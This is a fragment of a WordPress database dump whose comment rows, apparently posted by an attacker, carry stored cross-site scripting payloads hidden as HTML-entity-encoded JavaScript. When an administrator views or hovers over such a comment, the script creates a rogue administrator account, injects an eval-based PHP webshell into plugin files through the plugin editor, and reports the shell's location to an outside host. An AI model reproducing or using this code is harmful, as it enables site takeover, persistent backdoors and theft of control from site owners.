6;&#108;&#101;&#110;&#103;&#116;&#104;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#105;&#110;&#102;&#111;&#040;&#039;&#087;&#101;&#098;&#115;&#104;&#101;&#108;&#108;&#65306;&#039;&#043;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#116;&#101;&#109;&#112;&#044;&#034;&#119;&#112;&#045;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#047;&#112;&#108;&#117;&#103;&#105;&#110;&#115;&#047;&#034;&#043;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#041;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#032;&#010;&#032;&#032;&#032;&#032;&#125;&#032;&#010;&#032;&#032;&#125;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#102;&#097;&#105;&#108;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#034;&#101;&#114;&#114;&#111;&#114;&#034;&#041;&#059;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#097;&#108;&#119;&#097;&#121;&#115;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#125;&#041;&#059;\" style=\"display:block;position:absolute;width:100%;height:100%;top:0;left:0;\" \'><a></abbr></a>', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0);
INSERT INTO `wp_comments` (`comment_ID`, `comment_post_ID`, `comment_author`, `comment_author_email`, `comment_author_url`, `comment_author_IP`, `comment_date`, `comment_date_gmt`, `comment_content`, `comment_karma`, `comment_approved`, `comment_agent`, `comment_type`, `comment_parent`, `user_id`) VALUES
(150, 1, 'ter', 'pzsgkgynel@gmail.com', 'http://www.facebook.com/pwaaaonte4g', '45.55.138.250', '2015-11-12 00:17:46', '2015-11-12 00:17:46', 'Hi nice ar Asyn<abbr><a href=\'\r\nhref=\"\'> :-) <abbr title=\'\" onmouseover=\"&#118;&#097;&#114;&#032;&#097;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#115;&#112;&#108;&#105;&#116;&#040;&#039;&#047;&#039;&#041;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#120;&#117;&#114;&#108;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#097;&#091;&#097;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#045;&#049;&#093;&#044;&#034;&#117;&#115;&#101;&#114;&#045;&#110;&#101;&#119;&#046;&#112;&#104;&#112;&#034;&#041;&#059;&#010;&#118;&#097;&#114;&#032;&#102;&#105;&#108;&#101;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#112;&#117;&#114;&#108;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#097;&#091;&#097;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#045;&#049;&#093;&#044;&#034;&#112;&#108;&#117;&#103;&#105;&#110;&#045;&#101;&#100;&#105;&#116;&#111;&#114;&#046;&#112;&#104;&#112;&#034;&#041;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#102;&#105;&#108;&#101;&#050;&#032;&#061;&#032;&#091;&#039;&#104;&#101;&#108;&#108;&#111;&#046;&#112;&#104;&#112;&#039;&#093;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#083;&#116;&#097;&#114;&#116;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#032;&#061;&#032;&#049;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#115;&#104;&#101;&#108;&#108;&#099;&#111;&#100;&#101;&#032;&#061;&#032;&#034;&#060;&#063;&#112;&#104;&#112;&#092;&#110;&#105;&#102;&#040;&#105;&#115;&#115;&#101;&#116;&#040;&#036;&#095;&#080;&#079;&#083;&#084;&#091;&#039;&#100;&#097;&#107;&#039;&#093;&#041;&#041;&#123;&#040;&#036;&#119;&#119;&#119;&#032;&#061;&#032;&#036;&#095;&#080;&#079;&#083;&#084;&#091;&#039;&#100;&#097;&#107;&#039;&#093;&#041;&#032;&#038;&#038;&#032;&#064;&#112;&#114;&#101;&#103;&#095;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#039;&#047;&#097;&#100;&#047;&#101;&#039;&#044;&#032;&#039;&#064;&#039;&#032;&#046;&#032;&#115;&#116;&#114;&#095;&#114;&#111;&#116;&#049;&#051;&#040;&#039;&#114;&#105;&#110;&#121;&#039;&#041;&#032;&#046;&#032;&#039;&#040;&#036;&#119;&#119;&#119;&#041;&#039;&#044;&#032;&#039;&#097;&#100;&#100;&#039;&#041;&#059;&#101;&#120;&#105;&#116;&#059;&#125;&#034;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#108;&#097;&#117;&#114;&#108;&#032;&#061;&#032;&#034;&#104;&#116;&#116;&#112;&#058;&#047;&#047;&#119;&#101;&#098;&#046;&#053;&#049;&#046;&#108;&#097;&#058;&#056;&#050;&#047;&#103;&#111;&#046;&#097;&#115;&#112;&#034;&#059;&#010;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#120;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#071;&#069;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#100;&#097;&#116;&#097;&#084;&#121;&#112;&#101;&#058;&#032;&#039;&#104;&#116;&#109;&#108;&#039;&#044;&#032;&#010;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#125;&#044;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#100;&#097;&#116;&#097;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#100;&#097;&#116;&#097;&#041;&#059;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#105;&#110;&#112;&#117;&#116;&#035;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#095;&#099;&#114;&#101;&#097;&#116;&#101;&#045;&#117;&#115;&#101;&#114;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#061;&#111;&#046;&#097;&#116;&#116;&#114;&#040;&#039;&#118;&#097;&#108;&#117;&#101;&#039;&#041;&#059;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#120;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#097;&#099;&#116;&#105;&#111;&#110;&#039;&#058;&#032;&#039;&#099;&#114;&#101;&#097;&#116;&#101;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#095;&#099;&#114;&#101;&#097;&#116;&#101;&#045;&#117;&#115;&#101;&#114;&#039;&#058;&#088;&#116;&#111;&#107;&#101;&#110;&#044;&#039;&#117;&#115;&#101;&#114;&#095;&#108;&#111;&#103;&#105;&#110;&#039;&#058;&#039;&#111;&#098;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#101;&#109;&#097;&#105;&#108;&#039;&#058;&#039;&#114;&#111;&#111;&#116;&#064;&#120;&#115;&#115;&#049;&#046;&#099;&#111;&#109;&#039;&#044;&#039;&#102;&#105;&#114;&#115;&#116;&#095;&#110;&#097;&#109;&#101;&#039;&#058;&#039;&#111;&#098;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#108;&#097;&#115;&#116;&#095;&#110;&#097;&#109;&#101;&#039;&#058;&#039;&#111;&#098;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#117;&#114;&#108;&#039;&#058;&#039;&#119;&#119;&#119;&#046;&#120;&#115;&#115;&#049;&#046;&#099;&#111;&#109;&#039;&#044;&#039;&#112;&#097;&#115;&#115;&#049;&#039;&#058;&#039;&#111;&#098;&#112;&#097;&#115;&#115;&#039;&#044;&#039;&#112;&#097;&#115;&#115;&#050;&#039;&#058;&#039;&#111;&#098;&#112;&#097;&#115;&#115;&#039;&#044;&#039;&#114;&#111;&#108;&#101;&#039;&#058;&#039;&#097;&#100;&#109;&#105;&#110;&#105;&#115;&#116;&#114;&#097;&#116;&#111;&#114;&#039;&#044;&#039;&#099;&#114;&#101;&#097;&#116;&#101;&#117;&#115;&#101;&#114;&#039;&#058;&#039;&#065;&#100;&#100;&#043;&#078;&#101;&#119;&#043;&#085;&#115;&#101;&#114;&#043;&#039;&#125;&#010;&#032;&#032;&#125;&#041;&#032;&#010;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#039;&#111;&#107;&#039;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#010;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#108;&#097;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#071;&#069;&#084;&#039;&#044;&#010;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#115;&#118;&#105;&#100;&#039;&#058;&#049;&#051;&#044;&#039;&#105;&#100;&#039;&#058;&#049;&#056;&#054;&#052;&#054;&#056;&#053;&#050;&#044;&#039;&#118;&#112;&#097;&#103;&#101;&#039;&#058;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#125;&#010;&#032;&#032;&#125;&#041;&#032;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#102;&#097;&#105;&#108;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#034;&#101;&#114;&#114;&#111;&#114;&#034;&#041;&#059;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#097;&#108;&#119;&#097;&#121;&#115;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#125;&#041;&#059;&#010;&#010;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#071;&#069;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#100;&#097;&#116;&#097;&#084;&#121;&#112;&#101;&#058;&#032;&#039;&#104;&#116;&#109;&#108;&#039;&#044;&#032;&#010;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#125;&#044;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#100;&#097;&#116;&#097;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#100;&#097;&#116;&#097;&#041;&#059;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#105;&#110;&#112;&#117;&#116;&#035;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#061;&#111;&#046;&#097;&#116;&#116;&#114;&#040;&#039;&#118;&#097;&#108;&#117;&#101;&#039;&#041;&#059;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#116;&#101;&#120;&#116;&#097;&#114;&#101;&#097;&#035;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#032;&#061;&#032;&#111;&#046;&#116;&#101;&#120;&#116;&#040;&#041;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#039;&#060;&#063;&#112;&#104;&#112;&#039;&#044;&#115;&#104;&#101;&#108;&#108;&#099;&#111;&#100;&#101;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#100;&#105;&#118;&#046;&#097;&#108;&#105;&#103;&#110;&#108;&#101;&#102;&#116;&#032;&#098;&#105;&#103;&#032;&#115;&#116;&#114;&#111;&#110;&#103;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#102;&#105;&#108;&#101;&#032;&#061;&#032;&#111;&#046;&#116;&#101;&#120;&#116;&#040;&#041;&#059;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#105;&#102;&#040;&#088;&#116;&#111;&#107;&#101;&#110;&#038;&#038;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#038;&#038;&#102;&#105;&#108;&#101;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#039;&#058;&#088;&#116;&#111;&#107;&#101;&#110;&#044;&#039;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#039;&#058;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#044;&#039;&#097;&#099;&#116;&#105;&#111;&#110;&#039;&#058;&#039;&#117;&#112;&#100;&#097;&#116;&#101;&#039;&#044;&#039;&#102;&#105;&#108;&#101;&#039;&#058;&#102;&#105;&#108;&#101;&#044;&#039;&#112;&#108;&#117;&#103;&#105;&#110;&#039;&#058;&#102;&#105;&#108;&#101;&#044;&#039;&#115;&#117;&#098;&#109;&#105;&#116;&#039;&#058;&#039;&#085;&#112;&#100;&#097;&#116;&#101;&#043;&#070;&#105;&#108;&#101;&#039;&#125;&#032;&#010;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#010;&#032;&#032;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#115;&#117;&#098;&#115;&#116;&#114;&#105;&#110;&#103;&#040;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#105;&#110;&#100;&#101;&#120;&#079;&#102;&#040;&#039;&#119;&#112;&#045;&#097;&#100;&#109;&#105;&#110;&#039;&#041;&#044;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#105;&#110;&#102;&#111;&#040;&#039;&#087;&#101;&#098;&#115;&#104;&#101;&#108;&#108;&#65306;&#039;&#043;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#116;&#101;&#109;&#112;&#044;&#034;&#119;&#112;&#045;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#047;&#112;&#108;&#117;&#103;&#105;&#110;&#115;&#047;&#034;&#043;&#102;&#105;&#108;&#101;&#041;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#010;&#032;&#032;&#125;&#032;&#010;&#032;&#032;&#105;&#102;&#040;&#083;&#116;&#097;&#114;&#116;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#102;&#111;&#114;&#040;&#118;&#097;&#114;&#032;&#105;&#061;&#048;&#059;&#105;&#060;&#102;&#105;&#108;&#101;&#050;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#059;&#105;&#043;&#043;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#032;&#061;&#032;&#102;&#105;&#108;&#101;&#050;&#091;&#105;&#093;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#105;&#102;&#040;&#102;&#105;&#108;&#101;&#050;&#091;&#105;&#093;&#033;&#061;&#102;&#105;&#108;&#101;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#112;&#108;&#117;&#103;&#105;&#110;&#039;&#058;&#032;&#102;&#105;&#108;&#101;&#050;&#091;&#105;&#093;&#044;&#039;&#083;&#117;&#098;&#109;&#105;&#116;&#039;&#058;&#039;&#083;&#101;&#108;&#101;&#099;&#116;&#039;&#125;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#100;&#097;&#116;&#097;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#100;&#097;&#116;&#097;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#046;&#102;&#105;&#110;&#100;&#040;&#034;&#116;&#101;&#120;&#116;&#097;&#114;&#101;&#097;&#035;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#034;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#032;&#061;&#032;&#111;&#046;&#116;&#101;&#120;&#116;&#040;&#041;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#039;&#060;&#063;&#112;&#104;&#112;&#039;&#044;&#115;&#104;&#101;&#108;&#108;&#099;&#111;&#100;&#101;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#046;&#102;&#105;&#110;&#100;&#040;&#034;&#105;&#110;&#112;&#117;&#116;&#035;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#034;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#032;&#061;&#032;&#111;&#046;&#097;&#116;&#116;&#114;&#040;&#039;&#118;&#097;&#108;&#117;&#101;&#039;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#105;&#102;&#040;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#038;&#038;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#034;&#049;&#034;&#043;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#039;&#058;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#044;&#039;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#039;&#058;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#044;&#039;&#097;&#099;&#116;&#105;&#111;&#110;&#039;&#058;&#039;&#117;&#112;&#100;&#097;&#116;&#101;&#039;&#044;&#039;&#102;&#105;&#108;&#101;&#039;&#058;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#044;&#039;&#112;&#108;&#117;&#103;&#105;&#110;&#039;&#058;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#044;&#039;&#115;&#117;&#098;&#109;&#105;&#116;&#039;&#058;&#039;&#085;&#112;&#100;&#097;&#116;&#101;&#043;&#070;&#105;&#108;&#101;&#039;&#125;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#0